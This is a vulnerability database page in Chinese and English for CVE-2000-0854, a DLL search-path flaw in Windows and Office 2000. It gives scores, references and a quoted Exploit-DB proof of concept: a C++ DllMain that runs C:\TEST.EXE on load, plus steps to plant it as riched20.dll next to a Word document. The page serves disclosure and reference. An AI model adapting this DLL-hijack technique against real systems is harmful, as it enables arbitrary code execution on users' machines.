CVE-2000-0854
CVSS10.0
发布时间 :2000-11-14 00:00:00
修订时间 :2008-09-05 16:22:02
NMCOE    

[原文]When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document.


[CNNVD]Microsoft Office命令执行漏洞(CNNVD-200011-047)

        启动Microsoft Office 2000文件时,其目录首先用于DLL的查找如riched20.dll和msi.dll,攻击者可以通过向相同文件目录插入DLL特洛伊木马的方式执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0854
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0854
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-047
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1699
(VENDOR_ADVISORY)  BID  1699
http://archives.neohapsis.com/archives/win2ksecadvice/2000-q3/0117.html
(VENDOR_ADVISORY)  WIN2KSEC  20000918 Double clicking on MS Office documents from Windows Explorer may execute arbitrary programs in some cases
http://xforce.iss.net/static/5263.php
(UNKNOWN)  XF  office-dll-execution(5263)
http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0155.html
(UNKNOWN)  NTBUGTRAQ  20000921 Mitigators for possible exploit of Eudora via Guninski #21,2000
http://archives.neohapsis.com/archives/bugtraq/2000-09/0277.html
(UNKNOWN)  BUGTRAQ  20000922 Eudora + riched20.dll affects WinZip v8.0 as well

- 漏洞信息

Microsoft Office命令执行漏洞
危急 未知
2000-11-14 00:00:00 2005-05-02 00:00:00
远程  
        启动Microsoft Office 2000文件时,其目录首先用于DLL的查找如riched20.dll和msi.dll,攻击者可以通过向相同文件目录插入DLL特洛伊木马的方式执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20232)

MS Windows 2000/NT 4 DLL Search Path Weakness (EDBID:20232)
windows local
2000-09-18 Verified
0 Georgi Guninski
N/A [点击下载]
source: http://www.securityfocus.com/bid/1699/info

When a program executes under Microsoft Windows, it may require additional code stored in DLL library files. These files are dynamically located at run time, and loaded if necessary. A weakness exists in the algorithm used to locate these files.

The search algorithm used to locate DLL files specifies that the current working directory is checked before the System folders. If a trojaned DLL can be inserted into the system in an arbitrary location, and a predictable executable called with the same current working directory, the trojaned DLL may be loaded and executed. This may occur when a data file is accessed through the 'Run' function, or double clicked in Windows Explorer.

This has been reported to occur with the 'riched20.dll' and 'msi.dll' DLL files and some Microsoft Office applications, including WordPad.

This behavior has also been reported for files loaded from UNC shares, or directly from FTP servers. 

// dll1.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"
#include "stdlib.h"

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
   switch( ul_reason_for_call ) 
    { 
        case DLL_PROCESS_ATTACH:
         // Initialize once for each new process.
         // Return FALSE to fail DLL load.
			MessageBox(NULL, "Hello world!", "Info", MB_OK);
			MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to create it.", "Info", MB_OK);
			system("C:\\TEST.EXE");
            break;

        case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
		//	MessageBox(NULL, "DllMain.dll: DLL_THREAD_ATTACH", "Info", MB_OK);
            break;

        case DLL_THREAD_DETACH:
         // Do thread-specific cleanup.
            break;

        case DLL_PROCESS_DETACH:
         // Perform any necessary cleanup.
            break;
    }

    return TRUE;
}

1) Rename dll1.dll to riched20.dll
2) Place riched20.dll in a directory of your choice
3) Close all Office applications
4) From Windows Explorer double click on an Office document (preferably MS Word document) in the directory containg riched20.dll 		

- 漏洞信息

1563
Microsoft Windows / Office DLL Search Path Weakness
Context Dependent Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-09-18 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站